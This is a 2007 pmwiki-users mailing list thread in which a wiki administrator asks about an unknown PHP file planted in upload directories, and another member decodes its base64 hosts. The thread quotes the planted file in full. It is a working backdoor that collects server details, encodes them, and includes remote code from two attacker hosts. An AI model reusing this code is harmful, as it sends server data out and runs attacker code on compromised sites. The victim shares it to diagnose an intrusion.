So what's the purpose of this? Anyway to prevent them from reappearing after deletion?
Peter K.H. Gragert wrote: > The bas64 strings mean: > http://www3.rssnews.ws > http://www3.xmldata.info > All the SEVER-info of .. are given to: ... these http addresses ...(base 64 > encoded) > PKHG > > >> -----Oorspronkelijk bericht----- >> Van: [EMAIL PROTECTED] [mailto:pmwiki-users- >> [EMAIL PROTECTED] Namens Dr Fred C >> Verzonden: zaterdag 28 april 2007 18:35 >> Aan: PmWiki Users >> Onderwerp: [pmwiki-users] Mysterious php file appears in upload directory >> >> I went to upload a file to one of my wikis this morning and, while that >> went fine, I noticed a curious 43248.php file that had been uploaded to >> this upload directory, last night around 2:30 am. I checked with my >> FTP program and quite a number of my various wikis had a similar php >> file in the uploads directorys, and in the wiki.d directory -- always >> with a different # for the file name, always of the same size. >> >> I downloaded it and it contained this info. >> >> <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? >> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? >> $_SERVER["SERVER_NAME"] : >> $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? >> $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) >> ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) >> ? $_SERVER["QUERY_STRING"] : >> $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? >> $_SERVER["HTTP_REFERER"] : >> $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? >> $_SERVER["HTTP_USER_AGENT"] : >> $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? >> $_SERVER["REMOTE_ADDR"] : >> $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? >> $_SERVER["SCRIPT_FILENAME"] : >> $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? >> $_SERVER["HTTP_ACCEPT_LANGUAGE"] : >> $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".ba >> se64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_enc >> ode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($ >> i).".".base64_encode($j); >> if >> ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLnd >> z")."/?".$str))){} >> else >> {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmlu >> Zm8=")."/?".$str);} >> ?> >> >> -------- >> Any ideas on what is going on here? >> >> -- >> >> Always, Dr Fred C >> [EMAIL PROTECTED] >> >> >> _______________________________________________ >> pmwiki-users mailing list >> [email protected] >> http://www.pmichaud.com/mailman/listinfo/pmwiki-users >> > > > _______________________________________________ > pmwiki-users mailing list > [email protected] > http://www.pmichaud.com/mailman/listinfo/pmwiki-users > > > -- Always, Dr Fred C [EMAIL PROTECTED] _______________________________________________ pmwiki-users mailing list [email protected] http://www.pmichaud.com/mailman/listinfo/pmwiki-users
